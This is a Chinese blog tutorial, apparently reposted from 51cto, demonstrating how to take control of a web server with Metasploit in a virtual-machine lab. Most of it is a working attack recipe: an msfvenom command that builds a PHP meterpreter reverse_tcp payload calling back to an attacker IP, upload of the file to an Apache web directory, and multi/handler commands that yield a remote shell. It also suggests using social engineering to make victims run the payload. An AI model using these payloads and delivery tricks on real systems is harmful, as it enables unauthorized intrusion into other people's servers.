网络安全工程师演示:原来***是这样控制你的网站服务器的!

课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络***干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主机呢?接下来让我们一起学习!
二、资源装备
1.安装好 Win7的虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 将受害者主机(Windows7)跟***者主机(Kali Linux)的网络模式全部设置为NAT模式,如下图所示。
步骤:打开虚拟机的设置/选择网络适配器/选择NAT模式。
在这里插入图片描述

3.2 查看实验的两台主机的IP地址,如下图所示。
命令:ifconfig
在这里插入图片描述

3.3 利用“msfvenom”***生成工具生成对应的***文件,如下图所示。
步骤1:msfvenom工具的参数介绍
-p, –payload < payload> 指定需要使用的payload(***荷载)。也可以使用自定义payload,几乎是支持全平台的
-o, –out < path> 指定创建好的payload的存放位置。
-h, –help 查看帮助选项。
步骤2:利用msfvenom工具生成对应的***文件,如下图所示。
命令:msfvenom -p 指定需要使用的payload(***荷载) lhost=***者主机IP -f exe > 生成***文件的保存位置
例子:msfVenom -p php/meterpreter/reverse_tcp lhost=192.168.78.168 lport=4444 -r raw > /root/hack.php
在这里插入图片描述

步骤3:在已知的***文件保存路径目录下查找对应的***文件是否已经生成,如下图所示,***文件已经存在(这里使用图形化文件管理系统来查看,你也可以利用ls命令查看对应路径下面是否已经生成对应的***文件)。
在这里插入图片描述

3.4 利用一定的社会工程学方法将生成的***文件发送到目标受害者主机,并且在受害者主机进行运行(对应的社会工程学知识请持续关注本号,后续讲解),如下图所示。
在这里插入图片描述

3.5 安装“phpstudy集成环境”,如下图所示。
步骤1:打开“phpstudy”官网选择与你电脑系统相对应的软件版本下载。
步骤2:安装注意事项

  1. 安装路径不能包含“中文”或者“空格”,否则会报错(例如错误提示:Can't change dir to 'G:\x65b0\x5efa\x6587\)
  2. 保证安装路径是纯净的,安装路径下不能有已安装的V8版本,若重新安装,请选择其它路径
    步骤3:phpstudy官方使用教程,需者自取。
    网址:https://www.php.cn/course/1066.html
    在这里插入图片描述

3.6 安装好对应的软件后,启动phpstudy中的环境,如下图所示。
步骤1:点击相应的环境旁边的启动按钮启动即可。
在这里插入图片描述

步骤2:进入apache服务,如下图所示。
在这里插入图片描述

3.7 将对应的***文件上传到apache服务的www目录下,如下图所示。
在这里插入图片描述

3.8 启动Metasploit(msf)***框架,如下图所示。
命令1:msfconsole
在这里插入图片描述

命令2:use exploit/multi/handler
在这里插入图片描述

命令3:set payload php/meterpreter/reverse_tcp
在这里插入图片描述

命令4:show options
在这里插入图片描述

命令5:set lhost 192.168.78.168
在这里插入图片描述

命令6:run(启动***模块)
在这里插入图片描述

3.9 拿到目标主机服务器的shell,如下图所示。
命令:shell进入shell页面。
在这里插入图片描述
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多******技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
我学习更多Kali Linux***测试与网络***实战技巧!

猜你喜欢

转载自blog.51cto.com/14308022/2547556